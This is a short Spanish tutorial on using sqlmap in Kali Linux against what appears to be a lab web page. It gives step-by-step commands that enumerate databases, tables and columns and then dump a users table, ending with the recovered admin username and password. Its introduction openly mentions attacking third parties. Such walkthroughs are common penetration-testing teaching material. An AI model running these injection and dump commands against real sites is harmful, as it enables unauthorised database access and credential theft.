Sqlmap en Kali Linux
Introducción
SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable
Instalación
1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs
Esto nos debe de regresar algo asi
2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables
3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns
4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump
Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd
Ave que vuela, a la cazuela.